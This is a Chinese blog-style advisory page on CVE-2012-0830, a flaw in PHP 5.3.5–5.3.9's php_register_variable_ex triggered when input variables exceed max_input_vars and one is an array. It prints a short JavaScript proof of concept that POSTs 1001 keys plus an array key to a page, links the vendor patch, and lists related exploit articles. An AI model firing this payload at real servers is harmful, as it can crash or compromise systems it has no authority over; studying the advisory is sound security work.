php 函数漏洞,PHP “php_register_variable_ex()”函数任意代码执行漏洞(CVE-2012-0830)

最新推荐文章于 2021-03-19 09:17:01 发布
最新推荐文章于 2021-03-19 09:17:01 发布
阅读量146 收藏
点赞数
文章标签: php 函数漏洞

发布时间: 2012-01-11

漏洞版本:

PHP PHP 5.3.9

PHP PHP 5.3.8

PHP PHP 5.3.7

PHP PHP 5.3.6

PHP PHP 5.3.5

漏洞描述:

CVE-2012-0830

Php是一款流行的编程语言

PHP在12月为哈希碰撞拒绝服务(CVE-2011-4885)(http://sebug.net/vuldb/ssvid-30001)提供的补丁引出了另一个严重的安全漏洞。

防止哈希碰撞的补丁在php.ini中引入了新的配置属性:

max_input_vars

此配置元素限制用于请求中使用的变量数量(如http://request.com/foo.php?a=1&b=2&c=3),默认设置为1000。

漏洞修补在php_variables.c代码中的php_register_variable_ex函数中作了更改,不过当变量数超过max_input_vars,而变量又是数组变量时(if (*p == ‘['))可触发此漏洞。漏洞可导致任意代码执行。

< * 参考

https://bugs.php.net/bug.php?id=60708

http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

*>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)

// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

// Generate 1000 normal keys and one array

function createEvilObj () {

var evil_obj = {};

for (var i = 0; i < 1001; i++) {

evil_obj[i] = 1;

}

evil_obj['kill[]‘] = ‘kill’;

return evil_obj;

}

// Serialize Javascript object into POST data

function serializeObj (obj) {

var str = [];

for(var p in obj) {

str.push(p + “=” + obj[p]);

}

return str.join(“&”);

}

// Run attack

function attackSite () {

var bad = serializeObj(createEvilObj());

var xhr = new XMLHttpRequest();

xhr.open(“POST”, location.href, true);

xhr.setRequestHeader(‘Content-Type’,'application/x-www-form-urlencoded’);

xhr.setRequestHeader(‘Content-Length’, bad.length);

xhr.send(bad);

}

attackSite();

安全建议:

厂商解决方案

用户可参考如下供应商提供的安全补丁修复此漏洞:

http://svn.php.net/viewvc/php/php-src/trunk/main/php_variables.c?view=markup&pathrev=323007

陶涵煦
关注
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1162
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
php漏洞cve,PHP-5.3.9远程执行任意代码漏洞(CVE-2012-0830)
weixin_34561662的博客
03-09 290
还记得我之前说的PHP Hash Collisions Ddos漏洞吧? 最初的时候, 开发组给出的修复方案, 采用的是如果超过max_input_vars, 就报错(E_ERROR), 继而导致PHP出错结束. 而后来, 为了更加轻量级的解决这个问题, 我们又改善了一下, 变成了如果超过max_input_vars, 就发出警告(E_WARNING), 并且不再往目的数组添加, 但是流程继续....
php 跨站脚本,Piwigo register.php页面多个跨站脚本漏洞
weixin_30789921的博客
03-10 183
发布日期:2010-05-06更新日期:2010-05-11受影响系统:Piwigo project Piwigo 2.0.9描述:--------------------------------------------------------------------------------BUGTRAQ ID: 39958CVE(CAN) ID: CVE-2010-1707Piwigo是用PH...
php/5.3.10漏洞,PHP-5.3.9远程执行任意代码漏洞(CVE-2012-0830) 详解_PHP教程
weixin_42570484的博客
03-11 756
还记得我之前说的PHP Hash Collisions Ddos漏洞吧? 最初的时候, 开发组给出的修复方案, 采用的是如果超过max_input_vars, 就报错(E_ERROR), 继而导致PHP出错结束. 而后来, 为了更加轻量级的解决这个问题, 我们又改善了一下, 变成了如果超过max_input_vars, 就发出警告(E_WARNING), 并且不再往目的数组添加, 但是流程继续. ...
PHP文件包含漏洞详解
xysoul的专栏
06-30 1万+
http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以
第一次漏洞分析(暴雷漏洞CVE-2012-1889)
九层台
11-30 1261
作为第一次分析,从萌新的角度分析一下漏洞。 环境 windows xp sp3 ie 6 漏洞出现模块msxml3.dll 那么老xp版本还没有pie直接找这个地址就行,美滋滋。系统好像是延迟绑定的,在刚开始的时候这个模块并没有加载,让程序运行结束在ctl+g就能找到这个地址了。 触发脚本 &lt;html&gt; &lt;head&gt; &lt;title&gt;CVE 2012-...
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
**CVE-2018-8120详解:Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞,它属于本地权限提升(Local Security Authority Subsystem Service, LSA)漏洞类型。这个漏洞主要影响Windows...
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
**CVE-2017-3506:Apache Struts2远程代码执行漏洞** Apache Struts2是一款广泛使用的开源Web应用框架,它为开发者提供了一种构建基于MVC(Model-View-Controller)模式的Java Web应用程序的方式。在2017年,Apache...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675是一个特定的漏洞,它可能允许未经身份验证的远程攻击者执行代码或获取敏感信息,对系统的安全性构成威胁。 补丁“p12880299”是Oracle官方发布的一个修复程序,旨在修补CVE-2012-1675漏洞。补丁编号...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
漏洞分析】CVE2012-0002漏洞分析过程详述
Walter的专栏
07-23 8006
1、漏洞触发 发送攻击脚本后机器蓝屏效果如下: 测试环境:win xp professional sp2    2、ruby脚本源码及分析 #!/usr/bin/env ruby # ms12-020 PoC # NOTE: 本测试脚本基于中国民间流传的ChineseShit而写,并且修正了数据包不符合协议的问题 # Author: Joshua J. Drake(jduck)
OpenSSH 输入验证错误漏洞(CVE-2020-12062)漏洞修复(本人亲测)
热门推荐
知也无涯
09-09 1万+
目录 一: 漏洞描述: 二:修复方式 三: 修复流程 1:查找sshd和ssh位置 2:备份sshd 3: 搜索版本信息 4:替换版本信息(最重要的一步) 5:测试 一: 漏洞描述: OpenSSH 输入验证错误漏洞(CVE-2020-12062) 二:修复方式 漏洞安全对使用的软件扫描漏洞,都是依据软件的版本号探测的,直接升级软件风险太大,因此规避风险,修改软件版本号实现其目的! 采用方式:修改openSSH显示版本号 三: 修复流程 1:查找sshd和ssh位..
php5.5.3 补丁,PHP 5.2/5.3 Hash漏洞补丁发布 | moon's blog
weixin_42508185的博客
03-19 345
前日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在此PHP方面,<= 5.3.8, <= 5.4.0RC3的所有版本均会受此官方目前提供的解决方案是给自己的PHP环境打一个Patch,5.2和5.3都可以使用。Patch地址如下:https://github.com/laruence/laruence.github.com/tree/master/使用方法:1. c...
修复php-5.2.* hash漏洞
weixin_34032621的博客
03-27 359
前日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在漏洞PHP官方开发组成员Laruence(新浪微博)表示***者可以通过构造Hash冲突实现拒绝服务***,并提供了实例。这个***方法危害很高,***成本也很小,一个台式机可以轻松搞垮数十台、上百台服务器。 此漏洞一出,相当于随便一个***者就可以DDoS掉世界上的大部分网站!危害等级绝对是核弹...
【转载】通过构造Hash冲突实现各种语言的拒绝服务攻击
rabbit9898
12-31 196
  上周的时候Dmitry突然在5.4发布在即的时候, 引入了一个新的配置项: Added max_input_vars directive to prevent attacks based on hash collision 这个预防的攻击, 就是”通过调用Hash冲突实现各种语言的拒绝服务攻击漏洞”(multiple implementations denial-of-service v...
cve-2011-0027漏洞分析
小强的博客
07-25 2095
这个漏洞是整数溢出漏洞漏洞环境为win7+IE8 ,调试工具为windbg,静态分析工具为IDA。 主要参考《漏洞战争》相关介绍,实际分析了一下。 首先启动页堆。 打开IE8,windbg附加进程,然后IE打开poc文件。 poc.html文件如下: function Start() { localxmlid1 = document.getElementById
PHP漏洞全解————10、PHP文件包含漏洞
Fly_鹏程万里
07-05 8759
基本相关函数&lt;&gt;php中引发文件包含漏洞的通常是以下四个函数:include()include_once()require()require_once()reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。...
PHP 源码探秘 - 在解析外部变量时的一个问题
weixin_33938733的博客
11-18 171
安利 原文:我的个人博客 mengkang.net/1301.html 工作了两三年,技术停滞不前,迷茫没有方向,安利一波我的直播 segmentfault.com/ls/16500000… bug 复现 有个朋友跟我描述了一个bug,要我帮看看是什么情况。原本他有一个表单,如下。 <form method="post"> <input type="text" nam...
数据挖掘(三)相关数据集资源
最新发布
10-27
数据挖掘(三)相关数据集资源
SMBv3远程代码执行漏洞CVE-2020-0796防护指南
CVE-2020-0796,也被称为“永恒之黑”或“SMBGhost”,是一个存在于Windows SMBv3服务器和客户端实现中的远程代码执行漏洞。SMB(Server Message Block)是一种协议,用于在Windows网络中实现文件和打印服务的共享。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值